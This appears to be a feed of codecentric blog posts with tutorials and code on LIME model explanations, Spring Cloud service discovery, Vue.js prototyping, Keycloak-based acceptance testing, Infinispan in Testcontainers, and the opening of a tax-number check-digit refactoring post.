Machine learning models are a powerful tool in different areas of our life and they will become ever more prevalent. Therefore, it is our responsibility as Data Scientists and decision makers to understand how the models we develop and deploy make their decisions so that we can proactively work on preventing bias from being reinforced and removing it!

LIME

LIME stands for Local Interpretable Model-agnostic Explanations and is a tool that helps understand and explain the decisions made by complex machine learning models. It has been developed by Marco Ribeiro, Sameer Singh and Carlos Guestrin in 2016 [1] and can be used to explain any classification model, whether it is a Random Forest, Gradient Boosting Tree, Neural Net, etc. And it works on different types of input data, like tabular data (data frames), images or text.

At its core, LIME follows three concepts:

  • explanations are not given globally for the entire machine learning model, but locally and for every instance separately
  • explanations are given on original input features, even though the machine learning model might work on abstractions
  • explanations are given for the most important features by locally fitting a simple model to the prediction

This allows us to get an approximate understanding of which features contributed most strongly to a single instance’s classification and which features contradicted it and how they influenced the prediction.

The following example showcases how LIME can be used:
I built a Random Forest model on a data set about Chronic Kidney Disease [7]. The model was trained to predict whether a patient had chronic kidney disease (ckd) or not (notckd). The model achieved 99 % accuracy on validation data and 95 % on test data. Technically, we could stop here and declare victory. But we want to understand why certain patients were diagnosed with chronic kidney disease and why others weren’t. A medical professional would then be able to assess whether what the model learned makes intuitive sense and can be trusted. To achieve this, we can apply LIME.

As described above, LIME works on each instance individually and separately. So first, we take one instance (in this case the data from one patient) and permute it; i.e. the data is replicated with slight modifications. This generates a new data set consisting of similar instances, based on one original instance. For every instance in this permuted data set we also calculate how similar it is to the original instance, i.e. how strong the modifications made during permutation are. Basically, any type of statistical distance and similarity metric can be used in this step, e.g. Euclidean distance converted to similarity with an exponential kernel of specified width.
Next, our complex machine learning model, which was trained before, will make predictions on every permuted instance. Because of the small differences in the permuted data set, we can keep track of how these changes affect the predictions that are made.
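
With the exponential kernel mentioned above, for example, the weight of a permuted instance z with respect to the original instance x would be

similarity(x, z) = exp( -D(x, z)² / σ² )

where D is the chosen distance measure and σ is the kernel width.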

And finally, we fit a simple model (usually a linear model) to the permuted data and its predictions using the most important features. There are different ways to determine the most important features: we typically define the number of features we want to include in our explanations (usually around 5 to 10) and then either

  • choose the features with highest weights in the regression fit on the predictions made by the complex machine learning model
  • apply forward selection, where features are added to improve the regression fit on the predictions made by the complex machine learning model
  • choose the features with smallest shrinkage on the regularization of a lasso fit on the predictions made by the complex machine learning model
  • or fit a decision tree with fewer or equal number of branch splits as the number of features we have chosen

The similarity between each permuted instance and the original instance feeds as a weight into the simple model, so that higher importance is given to instances which are more similar to the original instance. This means that only simple models which are able to take weighted input can be used as explainers, e.g. a ridge regression.

Now, we can interpret the prediction made for the original instance. With the example model described above, you can see the LIME output for the eight most important features for six patients/instances in the figure below:

LIME explanations of example machine learning model

Each of the six facets shows the explanation for the prediction of an individual patient or instance. The header of each facet gives the case number (here the patient ID), which class label was predicted and with what probability. For example, the top left instance describes case number 4 which was classified as “ckd” with 98 % probability. Below the header we find a bar-plot for the top 8 most important features; the length of each bar shows the weight of the feature, positive weights support a prediction, negative weights contradict it. Again described for the top left instance: the bar-plot shows that the hemoglobin value was between 0.388 and 0.466, which supports the classification as “ckd”; packed cell volume (pcv), serum creatinine (sc), etc. similarly support the classification as “ckd” (for a full list of feature abbreviations, see http://archive.ics.uci.edu/ml/datasets/Chronic_Kidney_Disease). This patient’s age and white blood cell count (wbcc), on the other hand, are more characteristic of a healthy person and therefore contradict the classification as “ckd”.

Links and additional resources

This article is also available in German: https://blog.codecentric.de/2018/01/vertrauen-und-vorurteile-maschinellem-lernen/

  1. Marco Tulio Ribeiro, Sameer Singh, and Carlos Guestrin. 2016. “Why Should I Trust You?”: Explaining the Predictions of Any Classifier. In Proceedings of the 22nd ACM SIGKDD International Conference on Knowledge Discovery and Data Mining (KDD ’16). ACM, New York, NY, USA, 1135-1144. DOI: https://doi.org/10.1145/2939672.2939778
  2. Edwards, Lilian and Veale, Michael, Slave to the Algorithm? Why a ‘Right to an Explanation’ Is Probably Not the Remedy You Are Looking For (May 23, 2017). 16 Duke Law & Technology Review 18 (2017). Available at SSRN: https://ssrn.com/abstract=2972855
  3. http://www.insidertradings.org/2017/12/18/machine-learning-as-a-service-market-research-report-2017-to-2022/
  4. http://mitsloan.mit.edu/newsroom/press-releases/mit-sloan-professor-uses-machine-learning-to-design-crime-prediction-models/ and https://www.nytimes.com/2017/05/01/us/politics/sent-to-prison-by-a-software-programs-secret-algorithms.html
  5. https://www.bloomberg.com/news/articles/2017-12-04/researchers-combat-gender-and-racial-bias-in-artificial-intelligence
  6. https://www.engadget.com/2017/12/21/algorithmic-bias-in-2018/
  7. http://archive.ics.uci.edu/ml/datasets/Chronic_Kidney_Disease

The post Looking beyond accuracy to improve trust in machine learning appeared first on codecentric AG Blog.

Categories: Agile, Java, TDD & BDD

Spring Cloud Service Discovery with Dynamic Metadata

codecentric Blog - Sun, 07-Jan-18 23:00

Spring Cloud Service Discovery

If you are running applications consisting of a lot of microservices depending on each other, you are probably using some kind of service registry. Spring Cloud offers a set of starters for interacting with the most common service registries.

For the rest of this article, let’s assume you are familiar with the core Spring Boot ecosystem.

In our example we will use the service registry Eureka from Netflix running on localhost:8761. We will run two services, service-1 on port 8080 and service-2 on port 8081, both implemented with Spring Boot. In order to register itself and look up other services, each service includes the following starter as a build dependency:

<dependencyManagement>
  <dependencies>
    <dependency>
      <groupId>org.springframework.cloud</groupId>
      <artifactId>spring-cloud-dependencies</artifactId>
      <version>Dalston.SR4</version>
      <type>pom</type>
      <scope>import</scope>
    </dependency>
  </dependencies>
</dependencyManagement>

...

<dependency>
  <groupId>org.springframework.cloud</groupId>
  <artifactId>spring-cloud-starter-eureka</artifactId>
</dependency>

Each service has to configure its unique name and where the Eureka server is located. We will use the YAML format in src/resources/application.yml:

spring:
  application:
    name: service-1

eureka:
  client:
    serviceUrl:
      defaultZone: http://localhost:8761/eureka

The configuration of service-2 will look similar.

Service Discovery

The implementation of service-2 contains a simple REST controller to access the service registry:

@RestController
public class RegistryLookup {

   @Autowired
   private DiscoveryClient discoveryClient;

   @RequestMapping("/lookup/{serviceId}")
   public List<ServiceInstance> lookup(@PathVariable String serviceId) {
      return discoveryClient.getInstances(serviceId);
   }

}


In order to use the DiscoveryClient API, you have to use the annotation @EnableDiscoveryClient somewhere within your configuration classes.

A lookup of service-1 …

http://localhost:8081/lookup/service-1

… yields a lot of information on that service:

{
    "host": "SOME.IP.ADDRESS",
    "port": 8080,
    "secure": false,
    "instanceInfo": {
        "instanceId": "SOME.IP.ADDRESS:service-1:8080",
        "app": "SERVICE-1",
        ...

This information is used by REST clients like Feign to discover the HTTP endpoint of services by symbolic names like service-1.
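
For example, a Feign client can bind to service-1 purely by its registered name. A minimal sketch (the endpoint path /some-resource is made up for illustration; the application would also need the spring-cloud-starter-feign dependency and an @EnableFeignClients annotation):

// Resolves "service-1" via the service registry instead of a hard-coded host and port.
@FeignClient("service-1")
public interface ServiceOneClient {

   @RequestMapping(method = RequestMethod.GET, value = "/some-resource")
   String getSomeResource();
}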

Static Service Metadata

Each service can define arbitrary metadata within its configuration. With Eureka, this metadata can be a map of values defined in application.yml:

eureka:
  instance:
    metadata-map:
      fixed-s1: "value_1"

This metadata can be used by clients for various use cases. A service can describe SLAs, the quality of its data or whatever you want. But this metadata is fixed in the sense that it has to be known at build or deployment time. The latter is the case when you overwrite your Spring environment with JVM or OS environment variables. Either way, the metadata shows up in the lookup http://localhost:8081/lookup/service-1:

{
    "host": "localhost",
    "port": 8080,
    "uri": "http://localhost:8080",
    "metadata": {
        "fixed-s1": "value_1"
    },
    "secure": false,
    "serviceId": "SERVICE-1",
    ...
}

Dynamic Service Metadata

If a service wants to detect and register its metadata at runtime, you have to use the client API of the service registry in use. With the Eureka client this may look like this:

@Component
public class DynamicMetadataReporter {

   @Autowired
   private ApplicationInfoManager aim;

   @PostConstruct
   public void init() {
      Map<String, String> map = aim.getInfo().getMetadata();
      map.put("dynamic-s1", "value_2");
   }
}

The class ApplicationInfoManager is from the Eureka client API and allows you to dynamically add metadata that shows up if we query the service registry for service-1:

{
    "host": "localhost",
    "port": 8080,
    "uri": "http://localhost:8080",
    "metadata": {
        "dynamic-s1": "value_2",  // dynamic metadata
        "fixed-s1": "value_1"
    },
    "secure": false,
    "serviceId": "SERVICE-1",
    ...
}

The post Spring Cloud Service Discovery with Dynamic Metadata appeared first on codecentric AG Blog.

Categories: Agile, Java, TDD & BDD

Rapid prototyping with Vue.js

codecentric Blog - Thu, 04-Jan-18 23:57

When I started at codecentric, I had no clue about frontend frameworks. Sure, I knew my HTML and CSS and I did some dynamic pages with PHP, but who didn’t? The first frontend-only framework I seriously worked with was AngularJS. I had a hard time getting into it, which was mostly based on the fact that it was ill-used in our project setup. Instead of separate modules for different parts of the software, we had one giant controller that only got more and more code branches for all the little specialities that were necessary for our business cases.

After a while, our team broke up this massive pile of code. I was eager to help and got a better understanding of JavaScript and AngularJS every day. Today I am pretty familiar with AngularJS projects. Although there is one thing that has always bothered me: setting up a small Angular project, for example if you want to quickly try out an idea, can be pretty tedious.
I took a look at other frameworks (Angular 2, React) in the hope that it would be easier to start a project with them, but there you mostly start with an npm/webpack/whatever setup, which is often just totally oversized.

Then I came across Vue. And I really like how lightweight it can be. In this tutorial, I want to show you how quickly you can set up a dynamic webpage, even with REST functionality. A little bit of basic JavaScript knowledge is helpful here. You should also be familiar with the usage of your browser’s developer tools.

If you want to program along, create an index.html and paste this snippet. In the snippet I added some css styling, so the whole thing looks a little bit nicer.

Let’s start with a simple form:


  
    Zip:
    
    
  


  City
  Matching City:
  Insert zip to display matching city

This should render the following form:

Rendered form

The form should take a valid (in this case German) ZIP and show the matching city.
Now let’s init Vue.js. Add a link to vue.js to the header:


   

Then add a script snippet before the closing html tag where you init Vue:


<script>
    new Vue({
        el: '#zip-loader',
        data: {
            city: 'Insert zip to display matching city'
        }
    });
</script>

We don’t have an element ‘#zip-loader’ yet, so create a div with that id around the existing form:

<div id="zip-loader">
  <!-- the existing form goes in here -->
</div>

Replace the text ‘Insert zip to display matching city’ with {{ city }}, so that it looks like this:

Matching City: {{ city }}

Reload the file. It should look the same. Only the text is now taken out of the data part of the Vue instance we created. Try changing the text in the city field. It should change in your form. If something’s wrong, check your browser console for errors. Vue is very verbose and it’s often easy to spot the mistakes.

Let’s register the user’s input. Add a ZIP field to the data section of your vue instance and set it to be an empty string:

data: {
  zip: '',
  ..
}

Bind the new field to the input field in the form using v-model. Now everything the user enters here will be directly bound to the ZIP field in the data section of our Vue instance.

  <input v-model="zip">

Now let’s add a method that is called when a letter is entered:

  <input v-model="zip" v-on:keyup="parseZip">

Add a methods block in your Vue instance and define the method ‘parseZip’ in it. Let’s just log the value of the ZIP field.

methods: {
  parseZip: function () {
    console.log(this.zip);
  }
}

Now if you enter something in the input field, your browser should log it to the console. By the way, this references your Vue instance.

Now that we get user input, we need to do something with it. We want to load a matching city for an entered ZIP. Since we don’t have a backend, we use a public API for this. http://api.zippopotam.us/ offers a very easy to use API. If you call http://api.zippopotam.us/de/42697 (the ZIP of the city Solingen in Germany), you get a nice JSON object that holds all the necessary information:

{
  "post code": "42697",
  "country": "Germany",
  "country abbreviation": "DE",
  "places": [{
    "place name": "Solingen",
    "longitude": "51.1611",
    "state": "Nordrhein-Westfalen",
    "state abbreviation": "NW",
    "latitude": "05122"
  }]
}

Vue itself cannot make REST calls, so we need another library for this. I use axios, but you can use any REST library you like. To embed it, just add the JavaScript source to the header:


      

This enables you to make a GET call in the parseZip method:

parseZip: function () {
  axios.get('http://api.zippopotam.us/de/42697')
    .then(function (response) {
      console.log(response.data);
    });
}

Instead of logging the content of the ZIP field, we now make a REST call every time the user enters a key. The resulting data is then logged to the browser console.

Now modify the REST URL to take the ZIP from the data object of our Vue instance:

  axios.get(`http://api.zippopotam.us/de/${this.zip}`)

Note that I changed the single quotes to backticks here, so I can use template strings.

Since ZIP codes in Germany are generally 5 digits long, add a safeguard around the method, so that the API is not called with a definitely invalid ZIP. Also, change the log function to log the retrieved city. Take a look at the JSON object again, to better understand the syntax I used here.

if (this.zip.length === 5) {
  axios.get(`http://api.zippopotam.us/de/${this.zip}`)
    .then(function (response) {
      console.log(response.data.places[0]['place name']);
    });
}

To show the retrieved city on the website, just assign it to the data object. Note: We need to assign the Vue instance to a variable first, because the callback function of the REST call creates a new scope where this doesn’t reference the Vue instance any more.

const myApp = this;
if (this.zip.length === 5) {
  axios.get(`http://api.zippopotam.us/de/${this.zip}`)
    .then(function (response) {
      myApp.city = response.data.places[0]['place name'];
    });
}

If you now enter a valid ZIP into the input form, it should show the name of the matching city.

Now our basic functionality is done. Let’s finish up with a little error handling and a loading message.

To show an error message, add a catch block to the get method.

axios.get(`http://api.zippopotam.us/de/${this.zip}`)
.then(function (response) {
  myApp.city = response.data.places[0]['place name'];
})
.catch(function(){
  myApp.city = 'Not a valid zip code';
})

To show a loading message, we need a little additional CSS:


…
.visible {
  display: inline;
}
…

Add a loading flag to the data section:

data: {
  …
  loading: false
}

Set the flag to true before the GET call:

…
myApp.loading = true; 
axios.get(`http://api.zippopotam.us/de/${this.zip}`)
…

And set it to false when loading is done:

.then(function (response) {
  myApp.city = response.data.places[0]['place name'];
  myApp.loading = false;
})
.catch(function () {
  myApp.city = 'Not a valid zip code';
  myApp.loading = false;
})

Now all that is left is changing the CSS class of the Loading... text according to the flag.

Loading...

That’s it. We’re done. We created a dynamic, RESTful web page without any build or packaging tools. This shows why Vue is a great framework if you want to try something out very quickly.

You can look up the final code at https://github.com/Guysbert/vue-rapid-protoyping or play with it in this codepen.

See the Pen Rapid protoyping with vue by Andreas Houben (@ahouben) on CodePen.

The post Rapid prototyping with Vue.js appeared first on codecentric AG Blog.

Categories: Agile, Java, TDD & BDD

Continuous Validation for Security Configurations

codecentric Blog - Thu, 04-Jan-18 02:00

Testing integration with a component that has a life cycle completely separate from your application is hard. Think about a database system version upgrade: in more than one case it has led to the decision to skip automation entirely and rely on manual testing instead. An IAM solution is just like that. It’s configuration-heavy and it is often managed outside the scope of your team. However, end-to-end testing definitely forces us to consider how we functionally test our security.

Last year, Keycloak gained popularity (rated “Assess” on the ThoughtWorks Technology Radar) as an open source IAM solution, and it offers a wide range of APIs. My colleagues have already written some nice articles about it. I wanted to explore the opportunities of using Keycloak in our CI to improve the testability of our IAM integration.

With Keycloak you are able to continuously test IAM integration in your E2E test suite.

Recently I discovered Keycloak as an Identity and Access Management (IAM) candidate for our Gareth.io platform and another product which is still in incubation. So far, I am pleased with what I have found. The ease of integration via its endpoints is what makes it an especially interesting candidate. Additionally I found a good opportunity to use Keycloak as an E2E test candidate.

Keycloak is developed and promoted by Red Hat. The project pages are located at http://keycloak.jboss.org, and the sources can be found on GitHub. The product is completely written in Java and extensively uses Red Hat’s Java stack. WildFly is used as the default application server, and WildFly’s clustering and high availability functions are used as well. Read a nice introduction from my colleague here.

Step 1. Additions to the infrastructure

There are a number of options to configure Keycloak. There is an administrative UI, a config file (keycloak.xml), a CLI, and everything is also configurable via the REST interface. All applications living in the same logical domain belong to the same realm. A realm contains the functional administration options (e.g. allowed roles, user profile fields, authentication providers, etc.).

To make it testable, I used the jboss/keycloak Docker image to get a basic running Keycloak instance. I have a CI job that creates a basic Keycloak, specific to my project. I use it to configure my realm and roles. It has its own lifecycle and is managed by a separate pipeline. There is a base image which contains basic Keycloak realm configuration. Based on my Keycloak base image I build my production Keycloak (with enriched configuration) and multiple configuration variants for testing Keycloak in my CI pipeline.  

Step 2. Add Keycloak to the test project

Next, we need to add a Keycloak client to our test infrastructure. I use Cucumber (the Java variant) to drive my acceptance tests. I added the official Keycloak client JAR and the RESTEasy libraries.

In order to connect to it, you can instantiate the client like this:

Keycloak integration code example
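As a rough sketch of what such a client bootstrap typically looks like with the Keycloak admin client's KeycloakBuilder (server URL, realm and credentials are placeholder values, not the project's actual configuration):

import org.keycloak.admin.client.Keycloak;
import org.keycloak.admin.client.KeycloakBuilder;

public class KeycloakClientFactory {

    // All values are placeholders; point them at the Keycloak test container of your pipeline.
    public static Keycloak create() {
        return KeycloakBuilder.builder()
                .serverUrl("http://localhost:8080/auth")
                .realm("master")
                .clientId("admin-cli")
                .username("admin")
                .password("admin")
                .build();
    }
}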

 

 

 

 

 


Now let’s influence Keycloak with our newly bootstrapped library. We first define a Cucumber step and then create an implementation:

Cucumber test

 

And here is the corresponding Java implementation for our step. We will create a new user within the realm of the tested application and assign it an administrator role. Because we instantly want to use this user in our test, we need to mark it as enabled.

Cucumber test
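A hedged sketch of what such a step implementation could look like, assuming the admin client factory above; the Gherkin wording, realm name, role name and password are all assumptions:

import java.util.Collections;

import javax.ws.rs.core.Response;

import org.keycloak.admin.client.CreatedResponseUtil;
import org.keycloak.admin.client.Keycloak;
import org.keycloak.admin.client.resource.RealmResource;
import org.keycloak.representations.idm.CredentialRepresentation;
import org.keycloak.representations.idm.RoleRepresentation;
import org.keycloak.representations.idm.UserRepresentation;

import cucumber.api.java.en.Given;

public class UserSteps {

    private final Keycloak keycloak = KeycloakClientFactory.create();

    @Given("^an enabled admin user \"([^\"]*)\" exists$")
    public void anEnabledAdminUserExists(String username) {
        RealmResource realm = keycloak.realm("my-realm"); // realm name is an assumption

        // Create the user and enable it right away so it can authenticate during the test.
        UserRepresentation user = new UserRepresentation();
        user.setUsername(username);
        user.setEnabled(true);
        Response response = realm.users().create(user);
        String userId = CreatedResponseUtil.getCreatedId(response);

        // Give it a known password for the test.
        CredentialRepresentation password = new CredentialRepresentation();
        password.setType(CredentialRepresentation.PASSWORD);
        password.setValue("test-password");
        password.setTemporary(false);
        realm.users().get(userId).resetPassword(password);

        // Assign the realm-level administrator role.
        RoleRepresentation adminRole = realm.roles().get("admin").toRepresentation();
        realm.users().get(userId).roles().realmLevel().add(Collections.singletonList(adminRole));
    }
}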

 

Now this is just one example of the things you can do in your CI with Keycloak. I personally am not the biggest fan of testing too many non-functionals in E2E tests. Functionally, you can thoroughly test your registration and sign-in features. This is probably not where the main business value is delivered, but it is the start of the user experience in many applications, so we should make sure to catch regressions at an early stage of delivery. Furthermore, there are some really nice non-functional cases that used to be hard or required a lot of manual testing and that are now possible automagically.

Server side session invalidation

In a modern web application, security tokens can be distributed across apps, single-page application frontends and backend applications. Testing this is cumbersome and intrinsically complicated. With the Keycloak client you are now able to influence one or more realms. A very nice feature is ‘RealmResource.logoutAll()’, which invalidates all running sessions on the server. Afterwards you can verify that your clients behave accordingly. And there are plenty more features like this.
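As a small sketch of how this could be wired into a test helper (the realm name is again an assumption, and the admin client comes from the factory sketched above):

import org.keycloak.admin.client.Keycloak;

public class SessionSteps {

    private final Keycloak keycloak = KeycloakClientFactory.create();

    // Ends every active session in the realm; afterwards all clients have to re-authenticate.
    public void invalidateAllServerSideSessions() {
        keycloak.realm("my-realm").logoutAll(); // realm name is an assumption
    }
}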

Wrapping up

We have seen an example of how to integrate Keycloak into your acceptance test suite. Because we use Docker, it is easily integrated into popular CI tools like GitLab, Jenkins or CircleCI. Based on what I have seen so far, everything you can do in the Keycloak administrative interface is also administrable over REST. Next to this interface, there is also the possibility to use shell scripts for administrative purposes. For ultimate flexibility, Keycloak is easily and quickly booted in a container, so one could even swap out security providers.

My final advice is to keep your Cucumber steps generic. Once created, they can be reused across multiple projects and teams.

 

Handy sources and follow-up work

Keycloak on the ThoughtWorks Technology Radar: https://www.thoughtworks.com/radar/platforms/keycloak

Dieter Dirkes’ introduction: https://blog.codecentric.de/2016/06/accessmanagement-mit-keycloak/

Jannik Hüls: https://blog.codecentric.de/2016/08/single-sign-mit-keycloak-als-openid-connect-provider/

 

The post Continuous Validation for Security Configurations appeared first on codecentric AG Blog.

Categories: Agile, Java, TDD & BDD

Running an Infinispan server using Testcontainers

codecentric Blog - Mon, 18-Dec-17 23:00

Recently I discovered a library called Testcontainers. I already wrote about using it on my current project here. It helps you run software that your application depends on in a test context by providing an API to start docker containers. It’s implemented as a JUnit 4 rule currently, but you can also use it manually with JUnit 5. Native support for JUnit 5 is on the roadmap for the next major release. Testcontainers comes with a few pre-configured database- and selenium-containers, but most importantly it also provides a generic container that you can use to start whatever docker image you need to.

In my project we are using Infinispan for distributed caching. For some of our integration tests caching is disabled, but others rely on a running Infinispan instance. Up until now we have been using a virtual machine to run Infinispan and other software on developer machines and build servers. The way we are handling this poses a few problems and isolated Infinispan instances would help mitigate these. This post shows how you can get Infinispan running in a generic container. I’ll also try to come up with a useful abstraction that makes running Infinispan as a test container easier.

Configuring a generic container for Infinispan

Docker Hub provides a readymade Infinispan image: jboss/infinispan-server. We’ll be using the latest version at this time, which is 9.1.3.Final. Our first attempt to start the server using Testcontainers looks like this:

@ClassRule
public static GenericContainer infinispan =
      new GenericContainer("jboss/infinispan-server:9.1.3.Final");

@Before
public void setup(){
    cacheManager = new RemoteCacheManager(new ConfigurationBuilder()
            .addServers(getServerAddress())
            .version(ProtocolVersion.PROTOCOL_VERSION_26)
            .build());
}
  
@Test
public void should_be_able_to_retrieve_a_cache() {
    assertNotNull(cacheManager.getCache());
}

private String getServerAddress() {
    return infinispan.getContainerIpAddress() + ":" 
        + infinispan.getMappedPort(11222);
}

You can see a few things here:

  1. We’re configuring our test class with a class rule that will start a generic container. As a parameter, we use the name of the infinispan docker image alongside the required version. You could also use latest here.
  2. There’s a setup method that creates a RemoteCacheManager to connect to the Infinispan server running inside the docker container. We extract the network address from the generic container and retrieve the container IP address and the mapped port number for the hotrod port in getServerAddress()
  3. Then there’s a simple test that will make sure we are able to retrieve an unnamed cache from the server.

Waiting for Infinispan

If we run the test, it doesn’t work and throws a TransportException, though. It mentions an error code that hints at a connection problem. Looking at other pre-configured containers, we see that they have some kind of waiting strategy in place. This is important so that the test only starts after the container has fully loaded. The PostgreSQLContainer waits for a log message, for example. There’s other wait strategies available and you can implement your own, as well. One of the default strategies is the HostPortWaitStrategy and it seems like a straightforward choice. With the Infinispan image at least, it doesn’t work though: one of the commands that is used to determine the readiness of the tcp port has a subtle bug in it and the other relies on the netcat command line tool being present in the docker image. We’ll stick to the same approach as the PostgreSQLContainer rule and check for a suitable log message to appear on the container’s output. We can determine a message by manually starting the docker container on the command line using:

docker run -it jboss/infinispan-server:9.1.3.Final

The configuration of our rule then changes to this:

@ClassRule
public static GenericContainer container =
    new GenericContainer("jboss/infinispan-server:9.1.3.Final")
      .waitingFor(new LogMessageWaitStrategy()
         .withRegEx(".*Infinispan Server.*started in.*\\s"));

After this change, the test still doesn’t work correctly. But at least it behaves differently: It waits for a considerable amount of time and again throws a TransportException before the test finishes. Since the underlying TcpTransportFactory swallows exceptions on startup and returns a cache object anyway, the test will still be green. Let’s address this first. I don’t see a way to ask the RemoteCacheManager or the RemoteCache about the state of the connection, so my approach here is to work with a timeout:

private ExecutorService executorService = Executors.newCachedThreadPool();

@Test
public void should_be_able_to_retrieve_a_cache() throws Exception {
    Future<RemoteCache<Object, Object>> result =
             executorService.submit(() -> cacheManager.getCache());
    assertNotNull(result.get(1500, TimeUnit.MILLISECONDS));
}

The test will now fail should we not be able to retrieve the cache within 1500 milliseconds. Unfortunately, the resulting TimeoutException will not be linked to the TransportException, though. I’ll take suggestions on how to better write a failing test and leave it at that for the time being.

Running Infinispan in standalone mode

Looking at the stacktrace of the TransportException we see the following output:

INFO: ISPN004006: localhost:33086 sent new topology view (id=1, age=0) containing 1 addresses: [172.17.0.2:11222]
Dez 14, 2017 19:57:43 AM org.infinispan.client.hotrod.impl.transport.tcp.TcpTransportFactory updateTopologyInfo
INFO: ISPN004014: New server added(172.17.0.2:11222), adding to the pool.

It looks like the server is running in clustered mode and the client gets a new server address to talk to. The IP address and port number seem correct, but looking more closely we notice that the hotrod port 11222 refers to a port number inside the docker container. It is not reachable from the host. That’s why Testcontainers gives you the ability to easily retrieve port mappings. We already use this in our getServerAddress() method. Infinispan, or rather the hotrod protocol, however, is not aware of the docker environment and communicates the internal port to the cluster clients, overwriting our initial configuration.

To confirm this analysis we can have a look at the output of the server when we start the image manually:

19:12:47,368 INFO [org.infinispan.remoting.transport.jgroups.JGroupsTransport] (MSC service thread 1-6) ISPN000078: Starting JGroups channel clustered
19:12:47,371 INFO [org.infinispan.CLUSTER] (MSC service thread 1-6) ISPN000094: Received new cluster view for channel cluster: [9621833c0138|0] (1) [9621833c0138]
...
Dez 14, 2017 19:12:47,376 AM org.infinispan.client.hotrod.impl.transport.tcp.TcpTransportFactory updateTopologyInfo
INFO: ISPN004016: Server not in cluster anymore(localhost:33167), removing from the pool.

The server is indeed starting in clustered mode and the documentation on Docker Hub also confirms this. For our tests we need a standalone server though. On the command line we can add a parameter when starting the container (again, we get this from the documentation on Docker Hub):

$ docker run -it jboss/infinispan-server:9.1.3.Final standalone

The output now tells us that Infinispan is no longer running in clustered mode. In order to start Infinispan as a standalone server using Testcontainers, we need to add a command to the container startup. Once more we change the configuration of the container rule:

@ClassRule
public static GenericContainer container =
    new GenericContainer("jboss/infinispan-server:9.1.3.Final")
      .waitingFor(new LogMessageWaitStrategy()
         .withRegEx(".*Infinispan Server.*started in.*\\s"))
      .withCommand("standalone");

Now our test has access to an Infinispan instance running in a container.

Adding a specific configuration

The applications in our project use different caches, which can be configured in the Infinispan standalone configuration file. For our tests, we need them to be present. One solution is to use the .withClasspathResourceMapping() method to link a configuration file from the (test) classpath into the container. This configuration file contains the cache configurations. Knowing the location of the configuration file in the container, we can once again change the testcontainer configuration:

public static GenericContainer container =
    new GenericContainer("jboss/infinispan-server:9.1.3.Final")
      .waitingFor(new LogMessageWaitStrategy()
         .withRegEx(".*Infinispan Server.*started in.*\\s"))
      .withCommand("standalone")
      .withClasspathResourceMapping(
              "infinispan-standalone.xml",
              "/opt/jboss/infinispan-server/standalone/configuration/standalone.xml",
              BindMode.READ_ONLY);

@Test
public void should_be_able_to_retrieve_a_cache() throws Exception {
    Future<RemoteCache<Object, Object>> result =
         executorService.submit(() -> cacheManager.getCache("testCache"));
    assertNotNull(result.get(1500, TimeUnit.MILLISECONDS));
}

Now we can retrieve and work with a cache from the Infinispan instance in the container.

Simplifying the configuration

You can see how it can be a bit of a pain getting an arbitrary docker image to run correctly using a generic container. For Infinispan we now know what we need to configure. But I really don’t want to think of all this every time I need an Infinispan server for a test. However, we can create our own abstraction similar to the PostgreSQLContainer. It contains the configuration bits that we discovered in the first part of this post and since it is an implementation of a GenericContainer, we can also use everything that’s provided by the latter.

public class InfinispanContainer extends GenericContainer {

  private static final String IMAGE_NAME = "jboss/infinispan-server";

  public InfinispanContainer() {
    this(IMAGE_NAME + ":latest");
  }

  public InfinispanContainer(final String imageName) {
    super(imageName);
    withStartupTimeout(Duration.ofMillis(20000));
    withCommand("standalone");
    waitingFor(new LogMessageWaitStrategy().withRegEx(".*Infinispan Server.*started in.*\\s"));
  }

}

In our tests we can now create an Infinispan container like this:

@ClassRule
public static InfinispanContainer infinispan = new InfinispanContainer();

That’s a lot better than dealing with a generic container.

Adding easy cache configuration

You may have noticed that I left out the custom configuration part here. We can do better by providing builder methods to create caches programmatically using the RemoteCacheManager. Creating a cache is as easy as this:

cacheManager.administration().createCache("someCache", null);

In order to let the container automatically create caches, we use the callback method containerIsStarted(). We can override it in our abstraction, create a RemoteCacheManager and use its API to create the caches that were configured upfront:

...
private RemoteCacheManager cacheManager;
private Collection<String> cacheNames;
...

public InfinispanContainer withCaches(final Collection<String> cacheNames) {
    this.cacheNames = cacheNames;
    return this;
}

@Override
protected void containerIsStarted(final InspectContainerResponse containerInfo) {
    cacheManager = new RemoteCacheManager(new ConfigurationBuilder()
        .addServers(getServerAddress())
        .version(getProtocolVersion())
        .build());

    this.cacheNames.forEach(cacheName -> 
        cacheManager.administration().createCache(cacheName, null));
}

public RemoteCacheManager getCacheManager() {
    return cacheManager;
}

You can also retrieve the CacheManager from the container and use it in your tests.
There’s also a caveat with this approach: you can only create caches through the API if you use Hotrod protocol version 2.0 or above. I’m willing to accept that, as it makes the usage in tests really comfortable:

@ClassRule
public static InfinispanContainer infinispan =
      new InfinispanContainer()
          .withProtocolVersion(ProtocolVersion.PROTOCOL_VERSION_21)
          .withCaches("testCache");

@Test
public void should_get_existing_cache() {
    assertNotNull(infinispan.getCacheManager().getCache("testCache"));
}

If you need to work with a protocol version below 2.0, you can still use the approach from above, linking a configuration file into the container.

Conclusion

While it sounds very easy to run any docker image using Testcontainers, there are a lot of configuration details to know, depending on the complexity of the software that you need to run. In order to work effectively with such a container, it’s a good idea to encapsulate this in your own specific container. Ideally, these containers will end up in the Testcontainers repository so that others can benefit from your work as well.
I hope this will be useful for others. If you want to see the full code, have a look at this repository.

The post Running an Infinispan server using Testcontainers appeared first on codecentric AG Blog.

Categories: Agile, Java, TDD & BDD

Refactoring Algorithmic Code using a Golden Master Record

codecentric Blog - Sun, 17-Dec-17 23:00

Introduction

There are days when I find a piece of code I simply have to refactor. Sometimes because I actually have to for project-related reasons, sometimes because it’s easy to, and sometimes because I just want to. One definition of a nice day is when all these reasons meet.

Enter the Portuguese tax number verification.

For those who don’t know, in most countries the tax number has one or more check digits which are calculated according to some algorithm the country’s legislators think is up for the task. If you have a frontend where customers enter tax numbers, it’s a good first step to actually check the validity of the number according to the check digit in order to provide fast feedback to the user.

Usually I don’t do the research on the algorithms we implement for this myself. Someone else on my team calls someone from the country in question within the same organization, and we code monkeys usually get code snippets, such as this one. In this case I got curious. The Portuguese wiki contains a nice explanation of the check digit algorithm, which is a variation of an algorithm called (according to Google) the modulus 11 check digit algorithm.

Implementing this from scratch probably would have been straightforward, but I decided to refactor for several reasons:

  • Sometimes web sources can be wrong. Take, for example, this community wiki: here they seem to have forgotten about a part of the algorithm. If this had been my first source, I’d have had a bug report. Thus I usually try to stay close to the scripts my customers provide me with.
  • Refactoring this very isolated piece of code would be easy.
